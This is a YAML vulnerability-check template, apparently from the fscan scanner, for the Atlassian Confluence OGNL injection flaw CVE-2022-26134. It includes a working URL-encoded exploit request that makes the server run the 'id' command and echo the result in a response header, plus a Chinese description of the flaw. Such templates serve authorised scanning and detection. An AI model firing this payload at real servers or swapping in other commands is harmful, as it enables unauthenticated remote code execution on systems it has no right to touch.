mirror of https://github.com/qwqdanchun/fscan.git
17 lines
1.2 KiB
YAML
17 lines
1.2 KiB
YAML
name: Confluence-CVE-2022-26134
|
||
|
||
rules:
|
||
- method: GET
|
||
path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
|
||
expression: response.status == 302 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw_header)
|
||
detail:
|
||
author: zan8in
|
||
description: |
|
||
Atlassian Confluence OGNL注入漏洞
|
||
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
|
||
app="ATLASSIAN-Confluence"
|
||
links:
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26134
|
||
- http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-26134.html
|
||
- https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b9239b1dd
|